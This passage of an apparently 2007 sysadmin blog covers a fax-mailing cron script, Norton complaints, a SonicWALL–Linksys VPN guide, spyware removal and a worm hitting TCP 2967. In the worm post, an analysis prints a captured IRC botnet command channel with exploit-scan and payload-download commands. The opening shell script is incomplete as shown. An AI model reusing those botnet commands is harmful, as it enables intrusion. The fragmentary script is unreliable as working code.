if [ -f /mnt/drnobody/Sharedir/ER/DrNobodyScan/FAX001.pdf ]
# File is waiting so we mail it off
uuencode /mnt/drnobody/Sharedir/ER/DrNobodyScan/FAX001.pdf /tmp/FAX001.pdf | mail -s "ED Document Scan"
# REMOVE the file so it doesn't get re-faxed
rm /mnt/drnobody/Sharedir/ER/DrNobodyScan/FAX001.pdf

# No file is waiting so we stop this task and quit
echo "Nothing to be sent right now"
# Uh oh - the share is dead and we panic
echo "Directory doesn't exist, we need a remount - we will try to do it now"
mount -t smbfs -o username=myusernamehere,password=mypasswordhere //servername/SHARE /mnt/drnobody/
/usr/bin/mutt -i panic -s "ED Document Scan FAILED" < /dev/null

Now, you may say - "This is crazy! - Who will run this, and how often?". But that is where I slap you with a large bit of logic. I created a cron job (scheduler) that that will run this task every minute, of every hour, of every day. Since this is a scheduled job, we could do without the "echo" stuff too. I just put that there for my own debugging or for when I run this command myself from a terminal. My "crontab" looks like this ...

* * * * * /home/ballantynesd/ > /dev/null

I was able to add it to my crontab with "crontab -e". I had to mark the file executable too, with the usual "chmod 755".

Only thing left, is to tell the scanning software to name it's output files as FAX001.pdf, and tell the user's not to scan more than once per minute. ;-) I suppose I could add some support for handling multiple files ... perhaps tomorrorow.

-Steve Ballantyne

Saturday, February 10, 2007

Norton 2007 Is a Nightmare

I have never really been a fan of Norton Antivirus. Long ago the company I was working for bought and ran McAffee antivirus and it seemed to be pretty good stuff. But then we got the Melissa virus. Later, we got the I LOVE YOU virus. Soon after, we got Symantec - and we never had virus problems again.

Now, what exactly is the difference between Norton antivirus, and Symantec Antivirus. In some cases the Symantec corporation wants us to to feel the same about both products. I have the same protection at home as I do at work. I am as safe at home as I am at work. Yet at the same time, you shouldn't feel that the product you are using at work is just some garbage that you can pull off the shelf at Best Buy. Therefore, the products have retained separate identities.

I don't have many complaints about the corporate Symantec Antivirus. But at $65 and up per workstation it should be pretty good. The options are few, the updating and scanning seems simple enough, and the corporate management piece just works. Enter "Norton Antivirus", the home and small business product.

Recently we all had the displeasure of updating our workstations with Norton version 2007. Our 2006 stuff had expired, and with the purchase of new licenses came an all new product. I was hoping for a better interface and I didn't get it. I'm not sure where to begin with my hate for this product. I suppose it starts with the installation process - which went on forever and required several reboots. After a while, you wonder just how many different engines and services you really need to protect you from "the bad stuff of the Internet". Then the updates run, you are back to downloading, installing, and rebooting. The entire process took the better part of 40 minutes which is inexcusable for new (and fast) hardware.

Once installed, I could see that the user interface was not going to be a blessing. It seems that the engineers took anything that might confuse a user and buried it a few layers deep in options. If you ever had an opportunity to disable parts of the engine and leave yourself exposed, those options no longer exist. The result is a horribly simplistic interface which has been built in a fancy yellow framework that is so pathetically sluggish you have to wonder why they didn't just use the .NET parts like everyone else.

I tried to put it aside figuring that I really didn't need to make changes, Norton should protect me just fine and doesn't want my help in the process.

Maybe I was being silly. I should just get to work. Later that day I wanted to show a colleague how "Nessus" works. It's a pretty good open source vulnerability scanner and he needed to run a scan on one of our customers. To demonstrate, I ran a scan on myself. About ten seconds into this scan, Norton began to worry about me. I started seeing pop-overs in the corner of the screen. They said something to the effect of "someone tried to launch an attack against you - but we stopped it". Thanks Norton. I would have turned it off first ... if they gave me that option. But what about Norton actually performs firewall functions? It doesn't appear that Norton has a firewall feature anymore if you are looking at the options and user interface.

The pop-overs continued until all my resources were gone, and Windows gave up. My PC came to a screaming halt. I rebooted. This was not good. Once I booted back up I found that in the "Basic PC Settings" of the user interface was "Inbound Firewall". Oh good. I want to turn that off. Unfortunately, clicking on that option and choosing it ... was not possible. There was a general options link I could click in which there are no Inbound Firewall options.

Day two didn't get any better. I came into work that morning and logged in to find that Norton was harassing me with an ugly critical indicator in the corner. I brought up the window to see what all this fuss is about.

I see. I was being punished for having not performed a full scan of my computer when I had initially installed the product. Excuse me, but I had to get to work after spending an hour installing it. Norton just never seems to understand that you are trying to get work done. Norton likes to update your virus signatures in the middle of a critical task and then pop the alert window over what you were typing. Norton likes to scan your PC for virus's when you sit down in the morning to begin your day, sucking down every last bit of your systems resources.

I was fed up. But perhaps my frustration was unjustified. I'm sure that I can set these options somewhere. I don't want a full virus scan to run every morning when I sit down. Rather, we should run those in the middle of the night when I am at home, tucked away in my bed sleeping. After digging around in the obscure and poorly written interface, I came to the settings I was searching for ...

Here Norton is telling me that it's going to run a full scan every day at 4:00AM, starting today. But here we were 8:00AM that same day ... no scan had ever been performed. Norton, you missed your train. I am a forgiving person, and I will let that go. But we are *not* running a full scan right now. Better luck tommorrow. It continued to harass me. I continued to ignore it.

Next I thought I might change when Norton goes out and gets updates. I hate that I will be in the middle of something important and my hard drive lights up. It's as if a black hole opens in space and sucks in all my power. All I can do is wait. Every time I know it's Norton, who will soon proudly report "Virus definitions were successfully updated". I would love to never see this pop-over again. I want my updates to run at two in the morning. The computer is always on, doing nothing at 2:00AM. I started digging.

Oddly enough, if you want to change the time that Norton does it's updating, you will not find the options in the Norton control center. Where then, are these options? In control panel, under LiveUpdate. Of course! Finally coming to the options I want, I found that my choices were limited to hours or minutes. I have to decide on an amount of time between updates, and cannot pick the specific time of day - any more. Norton, you are about to forever leave my computer.

I started yelling back and forth over the wall to my colleagues. They all agreed that Norton 2007 was the worst peice of garbage that they had ever had the displeasure in running. With that, came the removal process.

Oddly enough, I can't tell you how nicely Norton was removed. Installing the product required an endless number of reboots. Uninstalling it took only one. Although, there was a second reboot shortly after to remove the separate LiveUpdate component. Yes, they leave LiveUpdate on your computer long after Norton is out of the picture. Why? For all of your other installed Symantec products, of course. Of which - I have none.

After uninstalling Norton, I immediately switched to the first free antivirus product I could find. AVG Free by Grisoft. This is a real-time antivirus scanner with scheduled updates (you pick when), mail filtering, shell integration, and nothing else. It was so simple to install and easy to configure ... it was just plain stupid. This product, which costs not a dime, just did what Norton would never allow me to do after hours of screwing around with it. Now, this product is meant for the home user - for home use only. If this works we need to begin purchasing licenses for everyone. But the cost is very low. We could get a five pack of product licences for the whole office for only $165. At $33 a copy it's half or one third what Norton presently costs.

I have been very pleased with the product. It's first day in action, it did exactly what I wanted it to do. It updated itself when I wasn't there. It ran it's full scan overnight. It left me alone and didn't bother me while I was trying to get my work done. It's simply a wonderful product.

Consider me a spokesperson for the product. You can try it to - Norton, you will not be missed.

-Steve Ballantyne

Tuesday, January 30, 2007

Building a Site-to-Site VPN Between SonicWALL and Linksys

A week or so ago I got a call from a customer who had gone out and purchased a Linksys router "with IPSec VPN" support. He was interested in placing this device at a remote site, and creating a VPN tunnel back to the SonicWALL that we manage. I recommended that he purchase SonicWALL devices for each site (he had more that he wanted to set up), but he was not interested in forking over the thousands of dollars that it would cost him ... and I couldn't blame him.

I have created VPN's between all sorts of odd ball devices, so I didn't think that this one would be any different. Yet this Linksys device would turn out to have quite a few caveats, hence my documentation here.

Some things to know about these new Linksys VPN devices: They used an embedded version of OpenSWAN, they have been known to slack on standards (such as encryption key length), they are not at *all* supported by SonicWALL (probably because of the loose interpretation of standards), you *CANNOT* have spaces in your policy name (it will accept them, but your policy will be broken).

Now, onto the "how to". For this example, I was using a Linksys RVS4000 with Firmware Version: V1.0.11 (out of the box default stuff). The SonicWALL is a Pro 2040 running the latest enhanced firmware, Note: I did not upgrade the Linksys firmware as I should not be supporting that device at all. Additionally, I am doing all of it's configuration remotely. I would never *dare* update firmware on a device over the Internet (and neither should you).

The Linksys configuration will be a tad more complicated, so we will start with that. Our goal will be to match the settings of the SonicWALL so that the second part goes easier. I have tried all sorts of mis-matched settings, and some of them worked. But if you want this to go smoothly you should stick to what you see here. Go ahead and get logged into your Linksys (if you need help with this part, RTFM).

Once logged in, click VPN from the top, and then VPN Passthrough. We want to *disable* all of these options. This is enabled for people who want to use a remote VPN client from behind this device. We are going to terminate the VPN to this device itself, so we do not want or need any of this enabled. It would only confuse the Linksys. After you disable them, be sure to click the Save Settings button.

Next, also under VPN at the top, click "IPSec VPN". This will bring up a window that you have to scroll through to see all of the options. For tunnel entry it will read "new". We will start with a name. It's HIGHLY important that you NOT use any spaces here. I made this mistake, and it took me an hour or so of troubleshooting cryptic messages to figure it out. Linksys should *not* all you to enter spaces here, but they do.

Keep scrolling and have a look at the other settings here. You can refer to this snapshot that I took.

For this policy that I created, I used "Subnet" for both local and remote. This is usually what you are trying to accomplish. That is, you have two networks (must be different networks) and you want to allow traffic to pass between them. You can also create a "host to network" configuration where one computer accesses a subnet (or vice versa). Obviously, local network should be what is configured on the Linksys device. Remote network, is what the primary subnet is defined as on the SonicWALL side.

For the Remote Security Gateway, choose IP address and put in the static IP of the SonicWALL. If you SonicWALL does not have a static IP, you can pick the "any" option here. But that also means that you would need to later use "agressive mode" and change the "Local Identity" and "Remote Identity" to a "Name" under advanced settings. Hopefully you have a static IP. That makes things easy. :-) Make sure you enter the static IP of the SonicWALL!! Not the SonicWALL's gateway IP (people confuse what they want in this box).

For Key Exchange Method we want to leave it at Auto. Flipping over to manual unlocks a lot of options that I wouldn't want to try and match up to the SonicWALL. For Encryption choose "3DES" (you have no other choice). For Authentication pick "SHA1" as this is what the SonicWALL uses as default. Make sure you disable "PFS" (also default on the SonicWALL). For Pre-Shared key enter a secret word (feel free to use special characters here, it makes the encryption stronger). You will need this password later when you configure the SonicWALL side. Lastly, for Key Life Time enter "28800".

Before you do anything else find the Save Settings button at the bottom which is almost hidden in the colored bar. Save those settings, and then scroll back down to the bottom of the screen and click the "Advanced Settings" button. You will get a pop-up window, so turn off any stupid pop-up blockers that you may be using.

Here is a snapshot that you can follow along with ...

For your Operational Mode, you want to use Main Mode. That is, unless the other end is using a dynamic IP address (in which case you would use Aggressive). For the Local and Remote Identity boxes, leave them at the default settings. This is telling the Linksys that it will trust the SonicWALL's identity based on the IP address that it is connecting from.

For encryption, use "3DES" and change the Authentication to "SHA1". Trust me, life will be easier on you when it comes time to configure the SonicWALL. For the "Group" you want to pick "1024-bit". Most people would call this "DH Group 2" (like the SonicWALL will). Make sure you also change this Key Lifetime to 28800. We do this, because the SonicWALL is not that flexible on these options. Some devices offer a lot of options for keys and might even expire them based on the amount of data being transferred. Again, to make like easier ... just make this 28800 seconds. Lastly, click the "Save Settings" button. Then "Close" this window. You're done here.

For the SonicWALL side, get logged into your SonicWALL and select "VPN" on the left side. Then, click the Add button to get a new policy (otherwise called an "SA") started up. If you have trouble here, RTFM!

We will start with the first tab. Here is a snapshot to follow along with ...

For Authenication Method, stick to the default. For name, pick whatever you want. If you are going to have a lot of these, you might want to pick a name that matches the Linksys at the other end. Or you can put something more meaningful here. SonicWALL will not punish you for using spaces. ;-)

For the IPsec Primary Gateway, enter the public IP address of the Linksys device. If it is using a dynamic IP, you can enter all zeroes here. Bear in mind, you would also have to change to agressive mode (at both ends) and use different "Local/Remote IKE ID" information. For the "Secondary" you can either enter zeroes, or let the SonicWALL do it for you. This field is in case you want to have a "failover" tunnel.

For the Shared Secret, enter the same Pre-Shared key that you used on the Linksys. This is your "secret word". Leave the Local and Peer IKE ID's alone (SonicWALL will know what to do here). Next, click the Network tab and have a look.

For the "Choose local network" you have some options here. If this is the only tunnel you will ever create, you can pick "LAN Primary Subnet". I have found that you can only use that object once in a policy, so I have got in the habit of making a new object that is a bit redundant. Click the drop down and choose "add network". I like to name it something meaningful such as use the network ID in the name, followed by a short description. Then if you have to look at this later, you will see the network ID right here in the policy. Now, make sure you create this is a "LAN" object, type is "Network". Enter the Network ID that this SonicWALL is configured for, and it's subnet mask. After you click "OK" you will be right back at this window.

For remote network, create a new network object that matches the Linksys. Your zone MUST BE "VPN" FOR THIS OBJECT. If it's not, this tunnel will not work!! Now you are ready to click the third tab "Proposals", and have a look.

Now we can be glad that we made all those changes to the Linksys. For Exchange, leave it at "Main Mode" (unless you had to switch to aggressive). For DH Group, leave it at Group 2 (which means, 1024-bit on the Linksys). Use all of the other settings that we did on the Linksys: 3DES, SHA1 and 28800 seconds. For Phase 2, leave the default of ESP, 3DES, and SHA1. Also notice, the default Life Time is 28800 here, and PFS is Disabled! In essence, you should change nothing here, but make sure everything matches up.

Now clidk the Advanced tab. There are some things here you may need later. I don't like the thought of NetBIOS going over a routed network. Some folks might need that option though (for lousy name resolution or old network printing). Also, its a good idea to check the Keep Alive option ... but do that later. One of the lessons I have learned is that if you run a Keep Alive on a bad configuration, your log will fill up with a bunch of failed attempts. Rather, wait until this tunnel is coming up successfully and make a note to come back and add this option. The Keep Alive will maintain this tunnel even when there is no traffic running across it. I like to keep tunnels up all the time, so that when people need to send traffic across it - the tunnel is up and ready.

Now comes the fun part. Click OK on the SonicWALL policy to save it away. Note that it's all ready "Enabled". Watching this screen will get you nowhere. It does not refresh, ever. So head back over to the Linksys device now in a different tab/window - and click that Enable button at the bottom of the policy window. Now, on the SonicWALL you can click the VPN > Settings option on the left which will refresh this screen. Do you have a "green light" on the SonicWALL's policy? Does it show an active connection in the lower portion of the window? Great! No green light? You have problems ... keep reading.

Regardless of whether or not it worked, you had better read the logs. I find that the SonicWALL logs are far better (at least in this match-up). So click "Log" on the SonicWALL and see what you have. A successful policy would look like this ...

Note that the first line in the log, is the last thing that it recorded. Your policy notes should end with "Adding IPSec SA" as you see in the illustration. If it all looks well, try to run some traffic through the tunnel. Bear in mind, you cannot ping the internal interfaces of the two devices. That is, you cannot ping the Linksys's LAN IP from the SonicWALL (or vice versa). I'm really not sure why this is, but I think it may have to do with the way that these devices are terminating the tunnel from end to end. So instead, try getting onto a PC connected to one network and ping a PC at the other end. If that fails - check the logs for errors, and also remember to disable personal/Windows firewalls! ;-)

I had some STRANGE problems when I first attempted this. I hope this helps someone out there.

1) The SonicWALL reports that the settings don't match, but they do! - I had the SonicWALL at one point tell me that the DH groups were different, when they were in fact matched. There was no convincing it otherwise, and the solution was to delete the policy, RESTART the SonicWALL, and start over. Don't waste your time trying anything else.

2) The tunnel is up, but traffic is not passing across it. - Check that the "remote" network on the SonicWALL side is configured as a "VPN" zoned object. You can find this setting in Network > Address Objects. If you accidentally made it a LAN or WAN object, you should go back to your policy, choose a different object (or create a new one) and name it something different. Then, go back and delete the one you made with errors.

3) The Linksys is not even starting the tunnel connection! - Did you put spaces in the policy name on the Linksys device? If you did, delete the policy and start over from scratch. Also check ALL of your settings and match them up. Look at the logs at *both ends* for clues, but know that the SonicWALL will be more helpful in determining the problem.

One thing I will say in favor of Linksys, their Log is "detachable" where SonicWALL keeps theirs glued down. What I mean is that you can create a Log "pop up" from the Linksys and keep that window aside while you troubleshoot. Here is how ...

FIRST - Disabled your policy on the Linksys to stop it from logging junk. Then, click Administration > Log. You need to enable the Local Log as it is not turned on by default. Then make sure you Save Settings. Once that has been done, you can click the "View Log" button and you get a nice little logging window. It's not very big, and it doesn't refresh itself. So you will have to refresh it, and actually turn through the pages yourself. Also, the messages you will get will only make sense to someone who has worked extensively with OpenSWAN. Yet, pasting these errors in Google may uncover some good hints.

Once you have enabled your logging and you have your window up, go back and click "Enable" on the policy. Then refresh your log, and turn through the four or five pages of messages. Good luck!! ;-)

If you are attempting this and get stuck, feel free to comment, share your advice, point out my wrong doings, etc.

-Steve Ballantyne

Sunday, January 28, 2007

Google Ads Have Nudity?

For a while now I have noticed a growing trend of pornography advertisements. I will be surfing along, visiting web sites that I have been on and off of for several years and then *boom* - you've got bare chested ladies down the side of your screen.

It wasn't until a month or so ago that I realized something was wrong. I was downloading chipset drivers for a friend of mine from VIA's website, There in the right margin was a couple sets of naked breasts. This really bothered me. Would a reputable company like this really stoop to that level for revenue? Looking at the page source it appeared that what I should have been seeing was Google Ad's, but they had been replaced somehow. Was this some sort of cookie hijacking? I got busy working on the project at hand and never investigated it further.

Today my browser crashed. The error message indicated that some awkwardly named dll had gone south, and the browser had to shut down. I have seen this before in earlier weeks and I just wrote it off to a bad component in Internet Explorer 7. But this was the second time today and I intended to get to the bottom of it. The object was called ~DP1C9.dll and when I performed a search on my hard drive for it - I turned up nothing. Next I went into the browser settings starting with "managed add-on's".

Oh, this was not good. Here I had somehow installed a "browser helper object" without a name. Surely if this was legitimate it would have been branded by the publisher. I disabled it immediately, and restarted Internet Explorer.

I was sure that I had somehow installed something nasty. What bothered me is that I have had this for probably a few months and nothing stopped it from installing. For that matter nothing ever caught it and told me about it! I checked my Symantec Antivirus definitions. They were up to date. But this seemed more like spyware, and Symantec has never been really good with detecting and removing that. More likely, this is something that Windows Defender should have stopped. For the sake of finding a cure, I went out and downloaded the latest and greatest copy of Windows Defeneder from Microsoft. I let it update to it's latest definitions and then performed a full scan.

Right now I am wondering why I waste the system resources on this product when it obviously doesn't work. I would have to take the law into my own hands.

First I would have to figure out where this little devil was hiding on my system. That ugly and awkward "manage add-on's" window was of no help to me. I ran reg-edit and searched for this object by it's object name.

Here it is, so that you won't have to retype it like I did. By the way, I would like to thank the engineers of Internet Explorer 7, for not allowing me to copy and paste anything from that window.


Incidentally, if you came to this posting because you found the above object ID on your system, you are infected. Read the rest of this for removal instructions.

I found a couple of keys right away. This one told me exactly where the bad dll file was hiding out. Notice that this is in a location that normal users like you and I are not supposed to tread. Therefore to find it with a "Search" I would have had to of performed an advanced search and looked for "hidden files", "system files", etc.

Heading out to that location on my drive I found the dll file(s). Even with the browser shut down, and the objects disabled I was not allowed to remove these. I'm betting I would have to boot into safe mode. They are welcome to stay I suppose since they will no longer have any attachments to the browser when I get done.

Next I got to work on removing all of the registry keys that involved this string. That was actually pretty easy. I just ran "regedit" and did a "Find". For every key I found with the above mentioned object ID, I deleted it. Then, I reopened Internet Explorer and made sure that the "browser helper" object no longer appeared in my "manage add on's" list.

Now I just needed to prove my theory. Was this little dll file what was actually turning all my Google Ads into pornography? It wouldn't take much to find out. I went out and visited the site that I last remember seeing this problem with. YOu might try this too. Below is the URL to a VIA Forum. Scroll over to the right corner, and check the Ad in the top right. You *should* see Google Ad text (not bare chested ladies).

To really make my point, I hopped onto my wifes computer. She has had this problem too. First we brought up the VIA Forum with the object enabled. She saw the pornography. Next we disabled the object, restarted the browser, and reloaded the page. Now she was seeing the Google Ads as they were meant to be.

I have no idea how this object got installed, but I have heard from other folks that they had this same problem. If you have a story to tell, drop me a comment.

-Steve Ballantyne

Wednesday, January 17, 2007

New Virus Attacks on TCP 2967

I was settling in Thursday for a couple hours of video games with my kids. We had just got back from Karate when my pager starting going off. One, two, three pages within minutes of one another. I would later find out that I had three different emergencies from different people. The first of which would take me a good hour and a half to chew through.

I connected into the SonicWALL of a newly added customer who was complaining that things simply "didn't work". My initial throughts were that the engineer who had configured the device earlier that day had made a mistake somewhere. It didn't take me long to find the problem. The SonicWALL had been configured in Transparent Mode allowing them to have a few servers on their DMZ with public addresses defined on them. The Transparent Mode requires that you create an object for the range of addresses, and a zone to put it in. The object was created as a "WAN" object, but had been put into a "LAN" zone. I have seen this before. The last time I had seen it was when I had made this same mistake. Remembering that simply changing the object didn't work, I reassigned the interface to a 192.x.x.x address. Next I deleted the object, and created a new one for the correct zone. Just for good measure, I restarted the SonicWALL.

Now traffic flowed perfectly - for about a minute and a half. "This is the same problem we had before we put the SonicWALL in", says the network admin. Next I went to work looking for signs of funny business. I brought up the connections list on the SonicWALL and found that it was "topped out". This particular SonicWALL supports up to 6,000 or so concurrent connections. They had hit that mark. Something was definitely wrong. The connections were all on TCP port 2967 and to what seemed like completely random hosts. The first octet was the same as the customers, but the remaining three were random numbers. This would make sense for a virus and we have seen some that attack NetBIOS this same way. It calculates a subnet mask based on your present address. That it, it assumes that if you have a class A address, it can access all the same hosts on that class A network. Because this customer had conigured a 24.x.x.x address, it was attempting to connect to all 16.7 million hosts to infect them.

Now we were getting to the root of the problem. "You have a virus", I say. "No, we are being attacked!", says the admin. I ran a packet trace on the activity. "No, you have a virus. I can see these connections are clearly coming from you".

The customer went on to complain that they didn't understand why the SonicWALL could not withstand the attack. I tried to explain that all devices have a well known limit of the number of connections that they can support, which is based on the amount of RAM that the unit has to spend on these connections. The customer didn't want to hear it. Looking for a quick solution, they yanked the SonicWALL and went without it. The effect of which was that they continued to try and spread the virus instead of fixing the problem.

Yesterday this same virus emerged again. This time, the customer gave me some time to analyze it, and attempt to trap it. I went right work disabling the initial attack. I created two acces rules for LAN to WAN traffic, discarding all TCP connections on ports 2967 and 2968. The "discard" was important, as a "deny" would still waste some time processing the connection and would keep the firewall at 100 percent CPU utilization. Next I went into the "super secret diagnostic page" of the SonicWALL (firewall.ip/diag.html) and flushed all connections. Back to the monitor, I was a little surprised to see that all the connections were full again. This time with NetBIOS ports (135, 139, 445). So I created a second LAN to WAN discard rule for the built in NetBIOS group. Oddly enough, that did not stop the attack, as the SonicWALL's built in NetBIOS group does *not* include TCP port 135. Rather than create a new group, or attempt to change a built in group ... I simply added one more rule. Another flush of the cache, and all was fine.

An hour or so later, I was back on the phone with the admin there. "These two laptops that were causing the trouble have a few hundred virus's on them", said the admin. Then I hit her with some further bad news. Both of the infected PC's were presently connected to an IRC server in Malaysia - doing "who knows what". I immediately dropped in another discarding rule this time stopping any traffic destined for this Malaysian server.

But curiosity got the best of me, and before I dumped these connections I ran a packet trace on the virus to see what it were doing. The connections were being made to a server on port 51555. Here is what it revealed (the data yanked from the capture using Ethereal).

PASS r0flc0mz
NICK [P00|USA|64502]
USER XP-2224 * 0 :TEACHLAP06-12
:SSH 001 [P00|USA|64502] :MySQL [P00|USA|64502]!~XP-2224@
:SSH 376 [P00|USA|64502] :
:[P00|USA|64502] MODE [P00|USA|64502] :+i
MODE [P00|USA|64502] -x+i
JOIN #bpe2# p00n3d
:[P00|USA|64502]!~XP-2224@ JOIN :#bpe2#
:SSH 332 [P00|USA|64502] #bpe2# :!t kill all -s|!sftp 2755 1 1 2.exe -s|!asc netapi 30 3 0 -b -e -h -s|!asc sym 30 3 0 -b -e -h -s|!asc dcom135 30 3 0 -b -e -h -s|!asc lsass445 30 3 0 -b -e -h -s|!asc asn139 30 3 0 -b -e -h -s|!ip.wget c:\3i3o.exe 1 -s
:SSH 333 [P00|USA|64502] #bpe2# 10:30 PM 1168912264
:SSH 366 [P00|USA|64502] #bpe2# :End of /NAMES list.
MODE #bpe2#

This was *not good*. I could see that the virus was successful in getting a connection to this server which seemed to be helping to get other virus's downloaded and installed to the infected PC. I just had to try it myself, so I made a connection to the server with a terminal based IRC client (on the specified port) - joined the channel, and had a look around.

09:19 -!- Topic for #bpe#: !t kill all -s|!sftp 2755 1 1 2.exe
-s|!asc netapi 30 3 0 -c -e -h -s|!asc sym 50 3 0 -a -e -h -s|!asc
asn139 30 3 0 -b -e -h -s|!asc mssql 30 3 0 -a -e -h -s
09:19 -!- Topic set by 10:30 [] [Wed Dec 31 19:00:00 1969]
09:19 [Users #bpe#]

I was hoping to walk into a channel and see a wide list of infected users. Then I could possibly start performing "whois" lookups on the infected hosts and attempt to pick off anyone else who might happen to be one of our customers. Those hopes were dashed when it became clear how well the server was locked down. Only IRCOP's would be able to see other users. Connected users, would only see themselves in a channel.

While all this was happening, I was yelling over the wall to our application developer. He was rushing to build some new SQL queries that would target 1) excessive connections on TCP 2967, and 2) any connections made to this Malaysian server. It would reveal about 5 to 7 more customers that were experiencing this same virus.

By now you may be asking "why did this virus slip through the cracks?". The answer to that question has always been the same: "updates!". When you don't update your Antivirus products, you pay a hefty price for it. This particular virus emerged in late December and has been spreading in high numbers in the past few days. It was able to spread thanks to a flaw in Symantec Corporate Antivirus products that has been patched since May of this past year. So why didn't these customers get the patch? Some had just not been updated in some time, such as roaming users on laptops who don't often connect to the business network. Others had simply stopped paying for the product. What many people think is "why should I keep paying for this product when the updates are free?". They raise a good point. Symantec (Norton) will provide you free updated "definitions" until the end of time. They will not, however, provide you free "product" updates. Old virus engines do not handle new virus definitions well, if at all.

If you don't update your antivirus engine, your new updates are only effective against old virus's. Now apply logic to that statement and ask yourself "when was I last infected by a 2 year old virus?".

Another good question is: why couldn't I find any good information about this virus? Answer: Symantec would rather not make headlines about this, as it is a virus that attacks a flaw in an antivirus product. Oh the irony. Some credit due to Symantec, as they patched this flaw when it was revealed. That's about the best thing you can ask of the vendor. I was later sent a link from my boss which gave some explanation to what we have seen over the past week ...

Persistent zombie attacks target Symantec corporate software

Keep on trucking folks! If you found any of this helpful, drop me a comment,
-Steve Ballantyne

Wednesday, January 03, 2007

SonicPoint's Eat UDP 14443 Connections

A while back I had a student call me from their sorority house reporting problems with their SonicWALL. The installation had started as one small wireless device/router, the TZ50W. When the signal seamed too weak to cover the entire house, they moved up to a slightly more powerful SonicWALL TZ170W. When that didn't work, we paid them a visit. It turns out that the house was gigantic and there was no chance that the wireless signal would flow through the 100+ year old plaster walls and solid wood floors. The solution was clear - we would need SonicPoints!

SonicPoints allow you to create one wireless profile (SSID, encryption scheme, etc) and then plug in a slew of wireless access point devices that use it. The catch is, of course, that you have to run physical cables between each SonicPoint and the one SonicWALL device (sometimes defeating the point). The good news is that this is a great solution for a multi-floor home like the sorority house - and if power is a problem you can purchase a POE switch and plug your SonicPoints into that.

Just when you think you are done troubleshooting, I got an emergency phone call. The SonicWALL was dropping connections left and right, and many students in the house were reporting "no Internet access". I was able to connect into the SonicWALL and have a look. What I expected to find was one or two students running excessive filesharing, and eating up all the active connections of the main device (fairly common in residential University settings). What I ended up finding was that the SonicPoints themselves were running the SonicWALL out of active connections! It looked something like this ...

In the case of the sorority house, there were literally thousands of UDP connections on port 14443. They were clearly coming from the SonicPoints. While I knew that the SonicPoints would open some line of communication with the SonicWALL for profiles and such, I knew that this couldn't be normal operation. I had them reboot the SonicWALL and it went back to normal. But only a few minutes later the connections started appearing again.

A call into SonicWALL reveals "this is a known issue". Also an apparently "undocumented known issue" with the current Enhanced Firmware, version The fix to this problem is to "roll back" to earlier firmware (nothing I ever like to do). But alas, I rolled back the firmware to and the extra connections went away. Case closed?

Today we had another customer call in for unrelated problems. They too have SonicPoints. They too use Enhanced Firmware. They too have several hundred UDP connections opened with their SonicPoints. I wonder who else has had this problem? Have you? Leave me a comment. Hopefully SonicWALL will fix this with the release of version 3.5.

-Steve Ballantyne